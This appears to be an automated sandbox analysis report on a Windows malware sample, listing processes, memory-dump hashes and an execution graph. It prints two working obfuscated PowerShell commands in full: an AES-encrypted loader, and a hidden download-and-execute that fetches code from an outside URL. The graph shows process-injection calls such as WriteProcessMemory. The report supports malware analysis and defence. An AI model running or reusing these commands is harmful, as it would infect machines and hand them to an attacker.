                                                                                                            Start time:07:42:07
                                                                                                            Start date:22/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function htXbx($EYwy){return -split ($EYwy -replace '..', '0x$& ')};$sMkL = htXbx('0F7A7222E17CFB1BB92172CFD10B1A0A35F2D236DE6DD8D72D66B13FEDB4D7CF6A19FA5E844D4EA4BDA294B8324F3D40BBE3A32FA2F602F7EEC40E64690703556F440E32E54DB889F70490BFAB024711BA156E7EF3961FB117120CBA4913EA1E5D84ACF6F55EBA7C85C4EDEAE94CA6F88E91D98428FF8C02DEA04EB6BC87CD7054DA2412B8E711F8C1A790EDD10E33300549B54953E993973674C4C6B322DF9A94608D0E38BF1B68335F96BFDC063A0ACAC3F5674C4FB62FD421AFD6B98437F6E9805448603B36D23A3100350C5424A024DEBEE06EFCCB25BC5C2ED9E55F0ECDF8D82A5F5B3DDE3DD01D9414613DC77C41FF3714787CA86BAB941A84FA1697BFD67AE1442E846F4C0BCD12067B97F4C4761C790D99134685BD29D33EB13930E881348CCEB581A392F1C4D3A954998DE262A182E3BA192BC030972631DFF7761B192A8E761FB393F15CEC5503F481993757B7386A6DEFCB30893CB5510F8D9DFCD357A4503657121993C1DA20619FC16A76829A33DC8BEC2C25B345E40D743AE3FA6908A2256106EDB3D401A541BBC6B63D25361ED338A28142AEDFD2E2AFA4224709FD2AB99578CAD2D426AC01B625107469B2CFC6F80544CD0418A85DF7B0034592F05C391690F1CB1F0E38C8C36984958B671982168DA7FCD4BA7B76DA7D1F52FBD0449C19027B914FDE6DE5FAAA8CB6BF3F2A4274A8F5CCEED4E85FE2BAE43E079DB816A326CFEC5CF89E8BDA8C7656D7ABB681564558044E3E53669EE9994092F98411AB22F4889A3454BB3DA6791DB0F9C47830F4C06A5461824C4CD5AF8028E685AAA4298897434D4728EDCF0C7F21C0C4A773C3B93B8D500AD8247E5F882A6D58627B2848A409F59326CE2F3C94419453CBD81D72A42EFC7700BF0F755EBF04E26ADC65680A8AB81DC31B386413F68BDCDF1C0851EABFB0BBAE9CCC1EEC68F50A6C1E0D56474F854AE2306A1E2A3F8B94A0127DD3E51C4A536048EF14CDBF4B53A4E0C3EEFEFA4EED2CFE4541E54F2D69773940D13F9015002C0555FDC45820883EE8D40D25214D7139E6E12032C2BFE100C55FA40524F297C439B1A01353D2284C6CEF35AC57E4400EDA829B3E642624CDFA0BC2973809DC3345E9E56C2D1156147CEA34B91CFFF59896E54208B4CFD4207A17F7308C33D76C6413AB80C8D92695DDC466BC03F75D4179A7F1740B7A3E5A6C6D80F2FB8D74FFB55BD62E27D14A6503857D18986D8E19A1D8E35AD79FEE150ABE148D1B1C3E2D9D92C0B0BDF7DE18DFF55FD02B3212CC62401C8900CAECAAADE5361BFC807F5384EEA46BABDA1F2032769CDA2B56A725574AD832150B7026D06D0547D37743BD92A3253A6BE7C4BE7457307E6CDE57B7840C35ECC06809A8FA8BF2351601EA6C1E3A025BA6CD107626BBF16CFED99355A4AC130AD2BEF7D8E3B1D936DC4D667BAE44082E02E0251C2355712885575901AEFDC0139AA662D0B9C4ACBF7403673B3C7DDF9E6E3AB15A286FC41C2D998ED91EDD22436BA61DD3F3D745E36681712D110962FBD642A2CB901801E7AF328696116A425AC0D6F7C474A297EBC5F89A3C52EE8DB03DE0214B816208AD47E4A4EB4864F152130AEA847AD1031A9DDED4248D031BCE58B447EB0CC8763D2CDBF3348D053D54B42C707D6DE3B3166FBF46CFB8F8AB676945A5D0B7FF4DD2DAF54B40F69592D58649EFE2B1F4CDADC627160733882C0C916DE660976CBCD588F71A3D08308A76F8B82ED698B928D9B2C66911F8A2975942AC360069AC4B4D6C8C7E50E99B0CBD066A58477B4F336F9B12A5FE792E23ED42C6032B887E634ABCA3D08214B16E5953BBD4FFBD057E229E4B7A149D754E75229CD7B38CB289B484AE636864DAFC411FEA976653DC57F0E7B6EA81960AC0059DB8FD2E23F7D92ABD90CDC902BB6F71F0094EF783BB18777A34E0B7531A8C1A945811E9CB1DB684D87CE6D7755E48B400E6042DC835F88592C2BEEB4E79F7A4C2B014C25A08F51C4F88F54AC90423E9054BC28B1315DD2E1A60D1391C76EED112CDC6F204754F5A5205EDE0E60452F5D8F99E50133A73E99D6E111610504CC3C2C332749FA5022F17C0BE5726446604D480D6F1CE03B718D3723525E2F713F6084FEDEE861F1C477451AAA4DE1C0C2CA11107A3D215341566A170DC382A4642BFA767DC00AF2A7DE717721F19583AC1E0AEDEED698700E2874EA1D5E5A307BDF5513CB550000C01A6C336844CAB950E01B1EA73586EC398AE12D51E7F1938D74FAA15E5FF538324B8D3A10819C846');$nSNd=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((htXbx('725944504E776C5A7566715556526E70')),[byte[]]::new(16)).TransformFinalBlock($sMkL,0,$sMkL.Length)); & $nSNd.Substring(0,3) $nSNd.Substring(129)
                                                                                                            Imagebase:0x890000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:5
                                                                                                            Start time:07:42:07
                                                                                                            Start date:22/12/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff66e660000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:07:42:09
                                                                                                            Start date:22/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:/B 'Net.WebClient';SV plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;SI Variable:\z (.$ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'G*Cm*t'}).Name).Invoke($ExecutionContext.(($ExecutionContext|GM)[6].Name).(($ExecutionContext.(($ExecutionContext|GM)[6].Name)|GM|Where-Object{(DIR Variable:\_).Value.Name-like'*Com*e'}).Name).Invoke('*w-*ct',1,$TRUE))(ChildItem Variable:\B).Value);SI Variable:O ((((Variable z).Value|GM)|Where-Object{(DIR Variable:\_).Value.Name-like'*wn*g'}).Name);($ExecutionContext|ForEach{(DIR Variable:\_).Value.(($ExecutionContext|GM)[6].Name)|ForEach{$_.(($ExecutionContext.(($ExecutionContext|GM)[6].Name).PsObject.Methods|Where-Object{(DIR Variable:\_).Value.Name-like'*w*i*ck'}).Name).Invoke((Variable z).Value.((GV O -ValueO)).Invoke((Variable plm).Value))}}).Invoke()
                                                                                                            Imagebase:0x890000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.3505131784.00000000073C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:07:42:09
                                                                                                            Start date:22/12/2024
                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            Imagebase:0x7ff66e660000
                                                                                                            File size:862'208 bytes
                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Target ID:22
                                                                                                            Start time:07:44:17
                                                                                                            Start date:22/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                            Imagebase:0x890000
                                                                                                            File size:433'152 bytes
                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Reset < >
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.2198905965.0000000006420000.00000010.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_6420000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction ID: 40083d4ca0dffdcc928e1808c21342abd99bf8729dad410611764d61e5d64354
                                                                                                              • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.2198905965.0000000006420000.00000010.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_6420000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction ID: 40083d4ca0dffdcc928e1808c21342abd99bf8729dad410611764d61e5d64354
                                                                                                              • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.2198905965.0000000006420000.00000010.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_6420000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction ID: 40083d4ca0dffdcc928e1808c21342abd99bf8729dad410611764d61e5d64354
                                                                                                              • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.2198905965.0000000006420000.00000010.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_6420000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction ID: 40083d4ca0dffdcc928e1808c21342abd99bf8729dad410611764d61e5d64354
                                                                                                              • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.2198905965.0000000006420000.00000010.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_6420000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction ID: 40083d4ca0dffdcc928e1808c21342abd99bf8729dad410611764d61e5d64354
                                                                                                              • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000003.2198905965.0000000006420000.00000010.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_3_6420000_mshta.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction ID: 40083d4ca0dffdcc928e1808c21342abd99bf8729dad410611764d61e5d64354
                                                                                                              • Opcode Fuzzy Hash: 3f0c7ada9f97049e94b5a3b009dc851e18c92a16d03b77f27e0fa18a9adcb566
                                                                                                              • Instruction Fuzzy Hash:
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 781220e54a52e44c42a83640a3635e0e319deb7856f3eb0aa97b093c4f7387f1
                                                                                                              • Instruction ID: a43507cb33ed16544481c7995525972bf32db4847f0ca280f0f32e1593d096b8
                                                                                                              • Opcode Fuzzy Hash: 781220e54a52e44c42a83640a3635e0e319deb7856f3eb0aa97b093c4f7387f1
                                                                                                              • Instruction Fuzzy Hash: 89522934B00214DFDB15DB29D854BADBBB2AF85300F1180D9E8469B395DF75AD82CF92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e3899517ea71ab0b17eb3f460c027357b227ddfe91988182cdd3ec2f0621b36d
                                                                                                              • Instruction ID: c17404c2e805abd3e98a8c2d1d144720ffa5d32d1773d1c0d6a47c14ff03e361
                                                                                                              • Opcode Fuzzy Hash: e3899517ea71ab0b17eb3f460c027357b227ddfe91988182cdd3ec2f0621b36d
                                                                                                              • Instruction Fuzzy Hash: D1D1F834A00219DFDB05CF99D484A9EBBF2FF88314F249199E805AB361C775ED82CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e9ad284c6c9f13111d7e67d62786e2bc96db74ec0a11d55afb9b3af9c0220b27
                                                                                                              • Instruction ID: f38665203ae05ecd1b81a0ffcec4dc6985cde79f1fc07ea2853c208fa404ae31
                                                                                                              • Opcode Fuzzy Hash: e9ad284c6c9f13111d7e67d62786e2bc96db74ec0a11d55afb9b3af9c0220b27
                                                                                                              • Instruction Fuzzy Hash: 96B18D74A00605CFCB15CF99C894AAABBF2FF88310B248699D9159B365C735FC52CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf9cce41883b4b64384bff812d233875f9f1c1b7e21caaa04043665321b3afb9
                                                                                                              • Instruction ID: 2791335a48308880f5c46509eb26ac7eed6e3d51fbfe88c5782259110cb75603
                                                                                                              • Opcode Fuzzy Hash: bf9cce41883b4b64384bff812d233875f9f1c1b7e21caaa04043665321b3afb9
                                                                                                              • Instruction Fuzzy Hash: F3517934A00218DFDB25DB69D854B9DBBB2FF89700F1181AEE505AB391DB71AC41CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d194e446a5f42215cd76b84d55f0f7c69cabcab30119cf41ac7f2207fb9c4045
                                                                                                              • Instruction ID: 43520bdb190cada2a573769335a6dd784563b5c6db3f580360ff7a1ddd8b068c
                                                                                                              • Opcode Fuzzy Hash: d194e446a5f42215cd76b84d55f0f7c69cabcab30119cf41ac7f2207fb9c4045
                                                                                                              • Instruction Fuzzy Hash: 37411574A00505DFCB09CF9AC9989AAFBF1FF88310B158699D915AB364C732FD51CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a179663feafa5c3a1110a1517af95a60b545eca569e5ebfed7e70e9a6ac7928c
                                                                                                              • Instruction ID: 3404fce9777b3996bcdcafaa4baaadcacce0e767bff7667219672ae3e23d2d90
                                                                                                              • Opcode Fuzzy Hash: a179663feafa5c3a1110a1517af95a60b545eca569e5ebfed7e70e9a6ac7928c
                                                                                                              • Instruction Fuzzy Hash: 6F21E574A00209DFCB04CF99C9949AAFBB1FF8C310B1581A9E909E7761C731ED51CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4f4aa9856bf9642d36dd6da9b3ac101139a90a47bbdca9cd1150a64357da36e8
                                                                                                              • Instruction ID: ec2604252b1d29f54d3b67a0f67b93e8db7b9e31616dd4bf49bd4c8ef7618eff
                                                                                                              • Opcode Fuzzy Hash: 4f4aa9856bf9642d36dd6da9b3ac101139a90a47bbdca9cd1150a64357da36e8
                                                                                                              • Instruction Fuzzy Hash: 44111F75A04208DFCB04DFA4E8509EDBB71FF89310F115199E905AB3A1DB75AC41CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2185497700.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2dbd000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2d1ce6d1c55103d8b0da6f3033a877b566a2fecf87c45c4acc1517865f944c33
                                                                                                              • Instruction ID: 3050720478c7b9533a19f5caf4b21c6dbf07154ff75ea9436c5838add3a53b73
                                                                                                              • Opcode Fuzzy Hash: 2d1ce6d1c55103d8b0da6f3033a877b566a2fecf87c45c4acc1517865f944c33
                                                                                                              • Instruction Fuzzy Hash: B301A272405344DAE7214A25C984BA6BF98DF81764F28C41AED8A4B382C7B99C41CAB1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2185497700.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2dbd000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2272cb6d7fbbec6e82589bcaf392848ae11f633030729fd7cb3ff77715e57d64
                                                                                                              • Instruction ID: ff9e837f935cc99dbded3222afeea4c914d8e3fde8e21175610a8351da3d4efd
                                                                                                              • Opcode Fuzzy Hash: 2272cb6d7fbbec6e82589bcaf392848ae11f633030729fd7cb3ff77715e57d64
                                                                                                              • Instruction Fuzzy Hash: C401406240E3C09ED7138B258894752BFB4DF43224F1D80DBD9888F2A3C2695845C772
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 37e4d961c97102eae5077f2950c9b2a4e494a857043a5a31b6bbb8a14a71b743
                                                                                                              • Instruction ID: 7ffe42066ea1ff2b44d07f7f7a73149f820725f3f1558dc67d11c17aee4da402
                                                                                                              • Opcode Fuzzy Hash: 37e4d961c97102eae5077f2950c9b2a4e494a857043a5a31b6bbb8a14a71b743
                                                                                                              • Instruction Fuzzy Hash: 8BE0C0B9D0820A9F8F48DFB9A4011FEBBF5A648211F10856FD819E2340E63446418FE1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2186937531.0000000004B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4b30000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 45b2b88b9a23aa67b39dea2db413ed412c0644aaa9e96a5aba04db9ba8186aae
                                                                                                              • Instruction ID: 525b055adbde2305723033eb4b4db4691f7e466b22f183cee8b759bf5341e4f5
                                                                                                              • Opcode Fuzzy Hash: 45b2b88b9a23aa67b39dea2db413ed412c0644aaa9e96a5aba04db9ba8186aae
                                                                                                              • Instruction Fuzzy Hash: E9E026B4E0424E9F8F48EFB995411BEFBF5AB48201F1085AE9819E3340E67456518F95

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:4.4%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:7.3%
                                                                                                              Total number of Nodes:314
                                                                                                              Total number of Limit Nodes:10
                                                                                                              execution_graph 82726 7398bd8 82727 7398bf0 82726->82727 82728 7398cfb 82727->82728 82733 7156be7 82727->82733 82738 71568d2 82727->82738 82743 7156d50 82727->82743 82747 71568e0 82727->82747 82734 7156c00 82733->82734 82735 7156b45 82733->82735 82735->82733 82736 7156db1 WriteProcessMemory 82735->82736 82737 7156dec 82736->82737 82737->82728 82741 71568dd 82738->82741 82739 7156db1 WriteProcessMemory 82740 7156dec 82739->82740 82740->82728 82741->82739 82742 715696e 82741->82742 82742->82728 82744 7156d9b WriteProcessMemory 82743->82744 82746 7156dec 82744->82746 82746->82728 82750 7156918 82747->82750 82748 7156db1 WriteProcessMemory 82749 7156dec 82748->82749 82749->82728 82750->82748 82751 715696e 82750->82751 82751->82728 82828 3095f78 82829 3095f8d 82828->82829 82830 3095fa3 82829->82830 82832 309602b 82829->82832 82833 3096035 82832->82833 82837 30979c0 82833->82837 82841 30979d0 82833->82841 82838 30979e5 82837->82838 82845 3097cf4 82838->82845 82842 30979e5 82841->82842 82844 3097cf4 8 API calls 82842->82844 82843 3096176 82844->82843 82846 3097cfe 82845->82846 82850 3098450 82846->82850 82888 3098441 82846->82888 82851 3098465 82850->82851 82926 309953d 82851->82926 82934 3098aa6 82851->82934 82938 3099738 82851->82938 82942 3098965 82851->82942 82946 3099167 82851->82946 82951 3098e6c 82851->82951 82955 3099225 82851->82955 82960 3098ca8 82851->82960 82964 309876a 82851->82964 82969 3098dd7 82851->82969 82973 3099016 82851->82973 82978 3099692 82851->82978 82982 3099812 82851->82982 82986 3098d1e 82851->82986 82990 3098f93 82851->82990 82994 309911f 82851->82994 82998 309859e 82851->82998 83002 3098ddd 82851->83002 83006 30993dd 82851->83006 83010 309861b 82851->83010 83014 3098b1d 82851->83014 83021 3098907 82851->83021 83025 30994d9 82851->83025 83029 3099340 82851->83029 83033 3098902 82851->83033 83037 309948e 82851->83037 83041 30993c0 82851->83041 83048 30992cb 82851->83048 83052 30985f6 82851->83052 83056 3098cf6 82851->83056 83060 3098bfe 82851->83060 83064 3098ef0 82851->83064 83071 3098d7d 82851->83071 83075 30991fd 82851->83075 83079 3098d3b 82851->83079 82889 3098450 82888->82889 82891 30992cb 2 API calls 82889->82891 82892 309948e 2 API calls 82889->82892 82893 30993c0 4 API calls 82889->82893 82894 3099340 2 API calls 82889->82894 82895 3098902 2 API calls 82889->82895 82896 3098907 2 API calls 82889->82896 82897 30994d9 2 API calls 82889->82897 82898 309861b 2 API calls 82889->82898 82899 3098b1d 4 API calls 82889->82899 82900 3098ddd 2 API calls 82889->82900 82901 30993dd 2 API calls 82889->82901 82902 309911f 2 API calls 82889->82902 82903 309859e 2 API calls 82889->82903 82904 3098d1e 2 API calls 82889->82904 82905 3098f93 2 API calls 82889->82905 82906 3099692 2 API calls 82889->82906 82907 3099812 2 API calls 82889->82907 82908 3098dd7 2 API calls 82889->82908 82909 3099016 2 API calls 82889->82909 82910 3098ca8 2 API calls 82889->82910 82911 309876a 2 API calls 82889->82911 82912 3098e6c 2 API calls 82889->82912 82913 3099225 2 API calls 82889->82913 82914 3098965 2 API calls 82889->82914 82915 3099167 2 API calls 82889->82915 82916 3098aa6 2 API calls 82889->82916 82917 3099738 2 API calls 82889->82917 82918 3098d3b 2 API calls 82889->82918 82919 309953d 4 API calls 82889->82919 82920 3098d7d 2 API calls 82889->82920 82921 30991fd 2 API calls 82889->82921 82922 3098bfe 2 API calls 82889->82922 82923 3098ef0 4 API calls 82889->82923 82924 30985f6 2 API calls 82889->82924 82925 3098cf6 2 API calls 82889->82925 82890 3097edf 82891->82890 82892->82890 82893->82890 82894->82890 82895->82890 82896->82890 82897->82890 82898->82890 82899->82890 82900->82890 82901->82890 82902->82890 82903->82890 82904->82890 82905->82890 82906->82890 82907->82890 82908->82890 82909->82890 82910->82890 82911->82890 82912->82890 82913->82890 82914->82890 82915->82890 82916->82890 82917->82890 82918->82890 82919->82890 82920->82890 82921->82890 82922->82890 82923->82890 82924->82890 82925->82890 82927 3099224 82926->82927 82929 3098602 82926->82929 83091 309fd90 82927->83091 83095 309fd88 82927->83095 82928 3099260 83083 30802e0 82929->83083 83087 30802d8 82929->83087 82935 3098602 82934->82935 82936 30802d8 WriteProcessMemory 82935->82936 82937 30802e0 WriteProcessMemory 82935->82937 82936->82935 82937->82935 82939 3098602 82938->82939 82940 30802d8 WriteProcessMemory 82939->82940 82941 30802e0 WriteProcessMemory 82939->82941 82940->82939 82941->82939 82943 3098602 82942->82943 82944 30802d8 WriteProcessMemory 82943->82944 82945 30802e0 WriteProcessMemory 82943->82945 82944->82943 82945->82943 82947 3099176 82946->82947 82949 309fd88 Wow64SetThreadContext 82947->82949 82950 309fd90 Wow64SetThreadContext 82947->82950 82948 30991a2 82949->82948 82950->82948 82952 3098602 82951->82952 82953 30802d8 WriteProcessMemory 82952->82953 82954 30802e0 WriteProcessMemory 82952->82954 82953->82952 82954->82952 82956 3099234 82955->82956 82958 309fd88 Wow64SetThreadContext 82956->82958 82959 309fd90 Wow64SetThreadContext 82956->82959 82957 3099260 82958->82957 82959->82957 82961 3098602 82960->82961 82962 30802d8 WriteProcessMemory 82961->82962 82963 30802e0 WriteProcessMemory 82961->82963 82962->82961 82963->82961 82965 309877d 82964->82965 82967 30802d8 WriteProcessMemory 82965->82967 82968 30802e0 WriteProcessMemory 82965->82968 82966 30987fe 82967->82966 82968->82966 82970 3098602 82969->82970 82971 30802d8 